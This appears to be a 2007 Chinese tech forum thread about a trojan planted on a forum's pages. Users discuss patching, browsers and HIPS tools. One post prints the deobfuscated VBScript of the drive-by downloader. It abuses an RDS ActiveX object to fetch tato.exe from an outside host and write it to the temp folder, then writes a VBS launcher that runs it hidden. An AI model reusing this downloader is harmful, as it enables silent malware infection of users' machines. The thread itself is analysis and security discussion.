中关村论坛有毒！

promised

原帖由 alainhenri 于 2007-3-24 23:38 发表

拜托.对于这种利用系统漏洞的网页挂的马.用非ie内核的浏览器就没有问题.如Firefox.

为啥我用遨游对上述情况没问题。。。。。。。。。

alainhenri

原帖由 promised 于 2007-3-24 23:47 发表

为啥我用遨游对上述情况没问题。。。。。。。。。

因为你的系统打了补丁.就没有问题.对于这些挂马的网站都是利用系统的已知漏洞.

icka

还原后的代码为

1. 
   
2. on error resume next
   
3. curl="http://chinare.drivehq.com/tato.exe"
   
4. fname1="tato.exe"
   
5. fname2="tato.vbs"
   
6. Set df = document.createElement("object")
   
7. df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
   
8. str="Microsoft.XMLHTTP"
   
9. Set x = df.CreateObject(str,"")
   
10. C1="Ado"
    
11. C2="db."
    
12. C3="str"
    
13. C4="eam"
    
14. str1=C1&C2&C3&C4
    
15. str5=str1
    
16. set S = df.createobject(str5,"")
    
17. S.type = 1
    
18. str6="GET"
    
19. x.Open str6, curl, False
    
20. x.Send
    
21. s1="Script"
    
22. s2="ing."
    
23. s3="File"
    
24. s4="SystemObject"
    
25. s0=s1+s2+s3+s4
    
26. set F = df.createobject(s0,"")
    
27. set tmp = F.GetSpecialFolder(2)
    
28. fname1= F.BuildPath(tmp,fname1)
    
29. S.open
    
30. S.write x.responseBody
    
31. S.savetofile fname1,2
    
32. S.close
    
33. fname2= F.BuildPath(tmp,fname2)
    
34. Set ts = F.OpenTextFile(fname2, 2, True)
    
35. ts.WriteLine "Set Shell = CreateObject(""Wscript.Shell"")"
    
36. sql="Shell.Run("""+fname1+""")"
    
37. ts.WriteLine sql
    
38. ts.WriteLine "set Shell=Nothing"
    
39. ts.close
    
40. if F.FileExists(fname1)=true then
    
41. if F.FileExists(fname2)=true then
    
42.     sha="Shell.App"
    
43.     shb=sha
    
44.     set Q = df.createobject(shb+"lication","")
    
45.     Q.ShellExecute fname2,"","","open",0
    
46. end if
    
47. end if
    

复制代码

promised

原帖由 alainhenri 于 2007-3-24 23:51 发表

因为你的系统打了补丁.就没有问题.对于这些挂马的网站都是利用系统的已知漏洞.

LZ安全意识还是不够啊

天命无极

原帖由 solcroft 于 2007-3-24 23:38 发表
本来想编辑帖子，却不小心删了
反正火狐也不难用，界面本来就和IE蛮相似。我几个比较菜鸟的朋友我都推荐他们用火狐，倒也用得满顺的。

嗯。火狐让我感觉不适应的主要是书签功能，开新书签是在原窗口而不是像傲游新开窗口，另外火狐的书签垃圾太多了，其它都还好！

天命无极

原帖由 promised 于 2007-3-24 23:54 发表

LZ安全意识还是不够啊

这倒是，我一直以来都不喜欢自动更新的，都是SP2没变！汗！！！下次要改，不然总有一天会挂！

alainhenri

原帖由 icka 于 2007-3-24 23:52 发表
还原后的代码为

on error resume next
curl="http://chinare.drivehq.com/tato.exe"
fname1="tato.exe"
fname2="tato.vbs"
Set df = document.createElement("objec ...

你好啊.呵呵在这里也可见到你.可以请教下解密的思路吗？

icka

其实不更新,然后按个HIPS软件,玩玩也不错,否则一直是静悄悄的,只有手动运行病毒才能看到那些让人心跳的提示.不爽.不过就担心万一一个不小心没处理好,硬盘的东西太多了.否则真想把补丁都卸载掉

spiha

FF根本没用 除了那所谓的非IE内核 资源占用又差 所谓速度快只是做了点小手脚而已 在浏览器上面JJYY不如用好hips
就算是下载的软件谁也不能保证没毒 网马打满补丁就算是IE也不会中

如果说资源占用和速度  还不如opera....


刚打满补丁的机器去用IE和TW访问都没事= =.. ... 真是 ...

蓝色牛仔裤

不喜欢自动更新可以用360安全卫士检测系统漏洞再下载更新的..我就是这样, 补丁很全, 上过很多毒网都能全身而退..
PS : 我用IE内核浏览器, TW.